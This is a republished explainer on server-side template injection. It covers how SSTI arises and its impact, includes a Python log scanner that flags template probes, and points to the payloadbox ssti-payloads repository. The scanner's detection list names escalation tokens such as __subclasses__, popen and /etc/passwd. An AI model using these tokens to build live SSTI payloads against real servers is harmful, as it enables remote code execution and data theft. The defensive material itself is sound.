
Example Analysis of SSTI-Payloads

2025-01-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

The editor shares with you this example analysis of SSTI payloads. Most people do not know much about the topic, so this article is shared for your reference; I hope you learn a lot from reading it.

Server-side template injection

Server-side template injection (SSTI) means that an attacker can use the native syntax of a template engine to inject a payload into a template, which is then executed on the server side. SSTI uses the server-side template engine of a common web framework as the attack medium: it exploits the weakness of embedding user input directly into a template. Beyond code execution, SSTI can also be used to find out the content structure of web applications.

By design, a template engine combines a fixed template with dynamic data to generate a specific web page. If user input is concatenated into the template content itself, rather than passed to the engine as a data parameter, a server-side template injection attack becomes possible. The attacker can then inject arbitrary template directives and manipulate the template engine, which generally leads to full control of the target web server. Because the payload is evaluated on the server, SSTI is more serious than a typical client-side template injection vulnerability.

Vulnerability impact

Server-side template injection vulnerabilities expose websites to a variety of attacks and security risks, depending on the template engine in question and how the application uses it. In rare cases these vulnerabilities pose no real security risk, but in most cases the impact of server-side template injection can be catastrophic.

In the most serious cases, an attacker can achieve remote code execution on the target server, take full control of the back-end server, and use it as a foothold for further attacks on the internal network infrastructure.

Even when full remote code execution is not possible, attackers can usually use server-side template injection as a springboard for many other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.
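As an added example (not from the original article or the payloadbox project), the Python script below scans request log lines for the template delimiters that SSTI payloads rely on, such as the `{{2*2}}` and `${...}` arithmetic probes in the payload set, and separates a plain probe from a value that already carries object-traversal or command-execution tokens. The log lines, parameter names and the engine hints are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Delimiters evaluated by common server-side template engines. A match only
# says "template syntax present"; several engines share the same delimiters.
PROBE_PATTERNS = [
    (r"\{\{.*?\}\}", "{{ }} expression (Jinja2/Twig style)"),
    (r"\{%.*?%\}", "{% %} block tag (Jinja2/Twig style)"),
    (r"\$\{.*?\}", "${ } expression (FreeMarker/Spring EL style)"),
    (r"\[\[.*?\]\]", "[[ ]] inline expression"),
    (r"<%=?.*?%>", "<% %> scriptlet (ERB/JSP style)"),
    (r"\{php\}|\{\$smarty", "Smarty tag"),
]
# Tokens from the payload set that appear once an attacker moves past an
# arithmetic probe toward object traversal or command execution.
ESCALATION_TOKENS = ("__class__", "__mro__", "__subclasses__", "__globals__",
                     "__builtins__", "__import__", "popen", "subprocess",
                     "Runtime", "ProcessBuilder", "Execute", "system", "/etc/passwd")

def scan_request(path_and_query):
    """One finding per query parameter carrying template syntax: the decoded
    value, an engine hint, and severity 'probe' or 'high' (escalation tokens)."""
    findings = []
    for name, value in parse_qsl(urlsplit(path_and_query).query,
                                 keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decoded once; catch double-encoding
        for pattern, hint in PROBE_PATTERNS:
            if re.search(pattern, decoded, re.DOTALL):
                escalates = any(tok in decoded for tok in ESCALATION_TOKENS)
                findings.append({"param": name, "value": decoded, "hint": hint,
                                 "severity": "high" if escalates else "probe"})
                break  # one finding per parameter is enough for triage
    return findings

def scan_log(lines):
    """Apply scan_request to access-log lines of the form 'METHOD target ...'."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 2:
            findings.extend(scan_request(parts[1]))
    return findings

# Constructed sample log lines, not real traffic; the last one is double-encoded.
SAMPLE_LOG = [
    "GET /greet?name=alice HTTP/1.1",
    "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1",
    "GET /search?q=%24%7B7*7%7D HTTP/1.1",
    "GET /greet?name=%257B%257Bconfig.__class__%257D%257D HTTP/1.1",
]
```

A `${...}` or `{{...}}` hit in legitimate input is possible, so treat the output as a triage signal to correlate with the application's template engine and response bodies (a reflected `49` after a `7*7` probe is the confirming sign), not as proof of exploitation.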

Payload set

The payload set collected in this article is the one maintained in the payloadbox/ssti-payloads repository; it can be cloned with the commands below.

Payload download

Researchers can use the following command to clone the existing payload set locally (HTTPS):

root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git

Researchers can use the following command to clone the existing payload set locally (SSH):

root@ismailtasdelen:~# git clone git@github.com:payloadbox/ssti-payloads.git

The above is the full content of this article, "Example Analysis of SSTI-Payloads". Thank you for reading! I believe you now have a basic understanding of the topic and hope the content has been helpful; if you want to learn more, you are welcome to follow the industry information channel.
